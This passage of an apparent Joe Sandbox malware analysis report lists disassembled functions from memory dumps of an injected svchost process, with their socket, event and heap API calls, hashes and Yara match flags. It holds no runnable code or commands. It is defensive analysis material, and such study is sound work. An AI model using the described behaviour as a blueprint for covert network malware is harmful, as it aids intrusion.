                                                                                                                • Part of subcall function 02583F50: SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                                • Part of subcall function 02583F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                                • Part of subcall function 02583F50: WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                                • Part of subcall function 02583F50: shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                                • Part of subcall function 02583F50: closesocket.WS2_32(?), ref: 02584015
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02583629
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 127459856-0
                                                                                                              • Opcode ID: 1c458ca6965d12bfe8ce0966d09d3978bca9e5a7df0a3452ff97f779392ccead
                                                                                                              • Instruction ID: 0ff89520b12aa18467d6309c2f6b714c76ddd17c7e042ee4f55f31e36cd7a61f
                                                                                                              • Opcode Fuzzy Hash: 1c458ca6965d12bfe8ce0966d09d3978bca9e5a7df0a3452ff97f779392ccead
                                                                                                              • Instruction Fuzzy Hash: D441A2B1640704AFD360EF69DC80B6AB7E4FB48710F50086EE646E7640D7B1E8148F94
                                                                                                              Function 04DF3500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 04DF3667
                                                                                                                • Part of subcall function 04DF3660: _free.LIBCMT ref: 04DF369C
                                                                                                                • Part of subcall function 04DF3660: _malloc.LIBCMT ref: 04DF36D7
                                                                                                                • Part of subcall function 04DF3660: _memset.LIBCMT ref: 04DF36E5
                                                                                                              • InterlockedIncrement.KERNEL32(04E21F0C), ref: 04DF3565
                                                                                                              • InterlockedIncrement.KERNEL32(04E21F0C), ref: 04DF3573
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 04DF359A
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 04DF35B3
                                                                                                              • ResetEvent.KERNEL32(?,?,?,04E21F0C), ref: 04DF35EE
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 04DF3621
                                                                                                              • GetLastError.KERNEL32 ref: 04DF3639
                                                                                                                • Part of subcall function 04DF3F60: GetCurrentThreadId.KERNEL32 ref: 04DF3F65
                                                                                                                • Part of subcall function 04DF3F60: send.WS2_32(?,04E159C0,00000010,00000000), ref: 04DF3FC6
                                                                                                                • Part of subcall function 04DF3F60: SetEvent.KERNEL32(?), ref: 04DF3FE9
                                                                                                                • Part of subcall function 04DF3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 04DF3FF5
                                                                                                                • Part of subcall function 04DF3F60: WSACloseEvent.WS2_32(?), ref: 04DF4003
                                                                                                                • Part of subcall function 04DF3F60: shutdown.WS2_32(?,00000001), ref: 04DF401B
                                                                                                                • Part of subcall function 04DF3F60: closesocket.WS2_32(?), ref: 04DF4025
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 04DF3649
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 127459856-0
                                                                                                              • Opcode ID: 72027df2480270b120f44f24f2c4cab5347152d30b23f52d704158a3f3c335bb
                                                                                                              • Instruction ID: ff10a6ed8b1bf32d64129a02c9f9eb8b5179091159503036eebbe6e2f0259b6a
                                                                                                              • Opcode Fuzzy Hash: 72027df2480270b120f44f24f2c4cab5347152d30b23f52d704158a3f3c335bb
                                                                                                              • Instruction Fuzzy Hash: FA418DB1640704AFE360EF69DD81B6AF7E8FB48701F12452EEA46D7640D7B5F8448B60
                                                                                                              Function 02584420 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ResetEvent.KERNEL32(?), ref: 02584433
                                                                                                              • ResetEvent.KERNEL32(?), ref: 0258443C
                                                                                                              • timeGetTime.WINMM ref: 0258443E
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0258444D
                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 0258449B
                                                                                                              • ResetEvent.KERNEL32(?), ref: 025844B8
                                                                                                                • Part of subcall function 02583F50: GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                                • Part of subcall function 02583F50: send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                                • Part of subcall function 02583F50: SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                                • Part of subcall function 02583F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                                • Part of subcall function 02583F50: WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                                • Part of subcall function 02583F50: shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                                • Part of subcall function 02583F50: closesocket.WS2_32(?), ref: 02584015
                                                                                                              • ResetEvent.KERNEL32(?), ref: 025844CC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                              • String ID:
                                                                                                              • API String ID: 542259498-0
                                                                                                              • Opcode ID: 4443ab9c429f4f4627b4abd00992b274ac77ccb06a2466fd2cd87c141500df9d
                                                                                                              • Instruction ID: 69e9c4e221d043380ece8f7f41f6033b4e9f3a421a68698b7c39398282adb011
                                                                                                              • Opcode Fuzzy Hash: 4443ab9c429f4f4627b4abd00992b274ac77ccb06a2466fd2cd87c141500df9d
                                                                                                              • Instruction Fuzzy Hash: 912193726407046BC630EF79DC84BABB7E8FF89710F100A0EF58AC7650E771A4148BA9
                                                                                                              Function 04DF4430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF4443
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF444C
                                                                                                              • timeGetTime.WINMM ref: 04DF444E
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04DF445D
                                                                                                              • WaitForSingleObject.KERNEL32(?,00001770), ref: 04DF44AB
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF44C8
                                                                                                                • Part of subcall function 04DF3F60: GetCurrentThreadId.KERNEL32 ref: 04DF3F65
                                                                                                                • Part of subcall function 04DF3F60: send.WS2_32(?,04E159C0,00000010,00000000), ref: 04DF3FC6
                                                                                                                • Part of subcall function 04DF3F60: SetEvent.KERNEL32(?), ref: 04DF3FE9
                                                                                                                • Part of subcall function 04DF3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 04DF3FF5
                                                                                                                • Part of subcall function 04DF3F60: WSACloseEvent.WS2_32(?), ref: 04DF4003
                                                                                                                • Part of subcall function 04DF3F60: shutdown.WS2_32(?,00000001), ref: 04DF401B
                                                                                                                • Part of subcall function 04DF3F60: closesocket.WS2_32(?), ref: 04DF4025
                                                                                                              • ResetEvent.KERNEL32(?), ref: 04DF44DC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                              • String ID:
                                                                                                              • API String ID: 542259498-0
                                                                                                              • Opcode ID: 05a36519dc3e943c18bf2078ad40ab512230277cb6e444986f75b43c9fe857b2
                                                                                                              • Instruction ID: 417981395d128afaca027e3c9295cebfa9847de1bf46e80043595051decc9c3c
                                                                                                              • Opcode Fuzzy Hash: 05a36519dc3e943c18bf2078ad40ab512230277cb6e444986f75b43c9fe857b2
                                                                                                              • Instruction Fuzzy Hash: C62171766407046BD630EF79EC85B97B3E8FF99715F110A1EEA8AC3650D671F8048BA0
                                                                                                              Function 02584E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 02584E79
                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 02584E98
                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 02584EA2
                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 02584EB9
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02584EC2
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02584EC9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082018349-0
                                                                                                              • Opcode ID: 91e7724ab9842986172d243b9489e7046316ea4950acb183c8dc1afdb38c1f3e
                                                                                                              • Instruction ID: 63a47812517ce3cb503b9ff0dee285bbc271fc8f0fd5d7dbed9e0870a9e5842a
                                                                                                              • Opcode Fuzzy Hash: 91e7724ab9842986172d243b9489e7046316ea4950acb183c8dc1afdb38c1f3e
                                                                                                              • Instruction Fuzzy Hash: 701166327043058BD320EF79EC84A6BB7DCFF88215B40092AE945D6540E7B1D825C6AA
                                                                                                              Function 04DF4E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,?), ref: 04DF4E99
                                                                                                              • TryEnterCriticalSection.KERNEL32(?,?), ref: 04DF4EB8
                                                                                                              • TryEnterCriticalSection.KERNEL32(?), ref: 04DF4EC2
                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 04DF4ED9
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF4EE2
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF4EE9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 4082018349-0
                                                                                                              • Opcode ID: 2a4099c3f05dbdc35e91f66899c820d0db11b7938dcef29fb8c2b95cb6e5055e
                                                                                                              • Instruction ID: fcbfc3d402419e216f6e08d76542b85a4beb69ec63f5388b954d70c14f1ad93a
                                                                                                              • Opcode Fuzzy Hash: 2a4099c3f05dbdc35e91f66899c820d0db11b7938dcef29fb8c2b95cb6e5055e
                                                                                                              • Instruction Fuzzy Hash: 6C1163327003059BD330EE6AEC8496BF7ECFF98326B05056BEA15C2550DA75F804C6A5
                                                                                                              Function 04DFDD60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 04DFDD82
                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 04DFDE85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: Main
                                                                                                              • API String ID: 1452528299-521822810
                                                                                                              • Opcode ID: d49830268b86bbf7949883c699d21dc4c9bff4f9bdb4c12ab27f3b749e957f5d
                                                                                                              • Instruction ID: 59a7ba06183abf3bf1f81b72d4815d1d802079ae711b9cf101993f2edead9328
                                                                                                              • Opcode Fuzzy Hash: d49830268b86bbf7949883c699d21dc4c9bff4f9bdb4c12ab27f3b749e957f5d
                                                                                                              • Instruction Fuzzy Hash: D2410032A402059FE720DF68DC81BAAB3F6FF54314F0586A9D98A8B351E774F845CB80
                                                                                                              Function 02583F50 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                              • SetLastError.KERNEL32(0000139F,?,7591DFA0,02583628), ref: 02584044
                                                                                                                • Part of subcall function 02582B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02582B96
                                                                                                                • Part of subcall function 02582B80: SwitchToThread.KERNEL32 ref: 02582BAA
                                                                                                              • send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                              • SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                              • WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                              • shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                              • closesocket.WS2_32(?), ref: 02584015
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 3254528666-0
                                                                                                              • Opcode ID: 29fdf06e1f57ab692066b2476fa0b4e58cef4e9809d1b28e281565a229cc9e35
                                                                                                              • Instruction ID: c7111e9278732811f32339d83cc865008d8bc84c55e8238c004bd6be83e33f93
                                                                                                              • Opcode Fuzzy Hash: 29fdf06e1f57ab692066b2476fa0b4e58cef4e9809d1b28e281565a229cc9e35
                                                                                                              • Instruction Fuzzy Hash: 29217C702407019BD330AF64D888B6BBBF9FF44714F500D1DE682AA680D7B9E469DB98
                                                                                                              Function 02584050 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584064
                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584077
                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584080
                                                                                                              • ResetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584089
                                                                                                                • Part of subcall function 02581350: HeapFree.KERNEL32(?,00000000,?,?,?,02584096,?,00000000,02584029,?,7591DFA0,02583628), ref: 02581390
                                                                                                                • Part of subcall function 02581420: HeapFree.KERNEL32(?,00000000,?,?,?,025840A1,?,00000000,02584029,?,7591DFA0,02583628), ref: 0258143D
                                                                                                                • Part of subcall function 02581420: _free.LIBCMT ref: 02581459
                                                                                                              • HeapDestroy.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 025840A9
                                                                                                              • HeapCreate.KERNEL32(?,?,?,?,00000000,02584029,?,7591DFA0,02583628), ref: 025840C4
                                                                                                              • SetEvent.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584140
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,02584029,?,7591DFA0,02583628), ref: 02584147
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1219087420-0
                                                                                                              • Opcode ID: 250495d5d28481d30fe96c6cc4d981443f6c653beef6097e3ccd22c6ba71bd16
                                                                                                              • Instruction ID: be4ed254c6a80a5145fde15306b9a488bd7e07b66af30bc07d9b375863aedc33
                                                                                                              • Opcode Fuzzy Hash: 250495d5d28481d30fe96c6cc4d981443f6c653beef6097e3ccd22c6ba71bd16
                                                                                                              • Instruction Fuzzy Hash: 8D314470600A02EFD705EF38C898BA6F7A9FF48310F408659E8299B250DB75B865CFD4
                                                                                                              Function 04C7B67F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_malloc
                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                              • API String ID: 3506388080-713438465
                                                                                                              • Opcode ID: 14e950ddf0dccbf98cbf7d550d4d5d320185db8f8e9866791adc7453f3865733
                                                                                                              • Instruction ID: feac29e046e93d51c25550d2bdee0a295dbb905e9ebb764e402aad54b292e7da
                                                                                                              • Opcode Fuzzy Hash: 14e950ddf0dccbf98cbf7d550d4d5d320185db8f8e9866791adc7453f3865733
                                                                                                              • Instruction Fuzzy Hash: 88D15DB1E01318AFEB10EFA9DC85A9EBBBAFF44304F104529E505A7251E774AD05CB61
                                                                                                              Function 02582140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 02581610: __vswprintf.LIBCMT ref: 02581646
                                                                                                              • _malloc.LIBCMT ref: 02582330
                                                                                                                • Part of subcall function 02586F63: __FF_MSGBANNER.LIBCMT ref: 02586F7C
                                                                                                                • Part of subcall function 02586F63: __NMSG_WRITE.LIBCMT ref: 02586F83
                                                                                                                • Part of subcall function 02586F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586FA8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap__vswprintf_malloc
                                                                                                              • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                              • API String ID: 3723585974-868042568
                                                                                                              • Opcode ID: 9db1c6bac3563d061337b94c3eb0bd798260d2d2980db8a59b628ca367f2ff8d
                                                                                                              • Instruction ID: 6dfd1a1bdc52e0bba7599f3f38fdbc5b480cbaa148ae6eb39181ad1809cfae3a
                                                                                                              • Opcode Fuzzy Hash: 9db1c6bac3563d061337b94c3eb0bd798260d2d2980db8a59b628ca367f2ff8d
                                                                                                              • Instruction Fuzzy Hash: B9B1D871A002458FCF18EF68D8906AA7FA1FF84310F0485AEDD49EB346DBB1D941CB98
                                                                                                              Function 04C7985F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 302COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$_malloc_memcpy_s
                                                                                                              • String ID: &
                                                                                                              • API String ID: 3027343870-3042966939
                                                                                                              • Opcode ID: 65a83305db069607c3800c09f97923d581d55ee0e02ebb3e7461dd1c2ae80e3c
                                                                                                              • Instruction ID: 89d7471db2960318dd8ac96eba71067386951c8d3c717efad8c9009696bf2e6e
                                                                                                              • Opcode Fuzzy Hash: 65a83305db069607c3800c09f97923d581d55ee0e02ebb3e7461dd1c2ae80e3c
                                                                                                              • Instruction Fuzzy Hash: 25C152F1A002199BEB24CF55CCC0BAAB7BAFF48304F1485ADE60DA7201D774AA85CF55
                                                                                                              Function 02A011FD Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: b4b76cfa2a3edca40d2e8d6e3424fa7c7b6a0884fbeb5bfd7a5d855ec5682a45
                                                                                                              • Instruction ID: 67e56d14cf4ce6ded4d65fe17d4757514412048b76445448156e7758a08ed21d
                                                                                                              • Opcode Fuzzy Hash: b4b76cfa2a3edca40d2e8d6e3424fa7c7b6a0884fbeb5bfd7a5d855ec5682a45
                                                                                                              • Instruction Fuzzy Hash: 2A515C72A00211DFDB14DF58D5C4899BBA6BF8D30871980BDC50D9B361DB32AD52CF92
                                                                                                              Function 04C711EF Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                              • Instruction ID: d1d508628e642a26344fe5b2cdcef12adcd4299d48008dfa3e82605e65c151e4
                                                                                                              • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                              • Instruction Fuzzy Hash: DA512AB2A001118FD714DF59C5C08A9BBA7BF8A31472D80ADC6599B321DB32BE02DB91
                                                                                                              Function 02581830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 02581878
                                                                                                              • _free.LIBCMT ref: 025818B6
                                                                                                              • _free.LIBCMT ref: 025818F5
                                                                                                              • _free.LIBCMT ref: 02581935
                                                                                                              • _free.LIBCMT ref: 0258195D
                                                                                                              • _free.LIBCMT ref: 02581981
                                                                                                              • _free.LIBCMT ref: 025819B9
                                                                                                                • Part of subcall function 02586F29: RtlFreeHeap.NTDLL(00000000,00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586F3F
                                                                                                                • Part of subcall function 02586F29: GetLastError.KERNEL32(00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000), ref: 02586F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 55202a1864c298acf64af94d508e21876712d147056cd834cebc1a2d96f5e08b
                                                                                                              • Instruction ID: b6029f7d61fe94fb0e1fe7e34b63a950a4d26c40ff71ec8c6e5ec5c1f6cfa8bc
                                                                                                              • Opcode Fuzzy Hash: 55202a1864c298acf64af94d508e21876712d147056cd834cebc1a2d96f5e08b
                                                                                                              • Instruction Fuzzy Hash: 9A515DB2A00511DFD714EF59D180855BBA6BF8931871AC4ADC50EAB311CBB2ED43CF95
                                                                                                              Function 02583850 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02583863
                                                                                                              • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 025838A4
                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02583911
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0258393C
                                                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 025839D4
                                                                                                              • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02583A02
                                                                                                              • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02583A19
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058130114-0
                                                                                                              • Opcode ID: 2c7c5247c707e29cf77b77bee6b70c013c3913b3947f55afee08ca0ace4a1c85
                                                                                                              • Instruction ID: bee3f37d534bde4056b6e66319caa116a127d7cfba830cfb1d138bfe3e315db9
                                                                                                              • Opcode Fuzzy Hash: 2c7c5247c707e29cf77b77bee6b70c013c3913b3947f55afee08ca0ace4a1c85
                                                                                                              • Instruction Fuzzy Hash: 3D51B370A00701ABDB60FF24C9847AABBE9FF44B14F504959ED5AE7680EBB0E400CF59
                                                                                                              Function 0258984E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
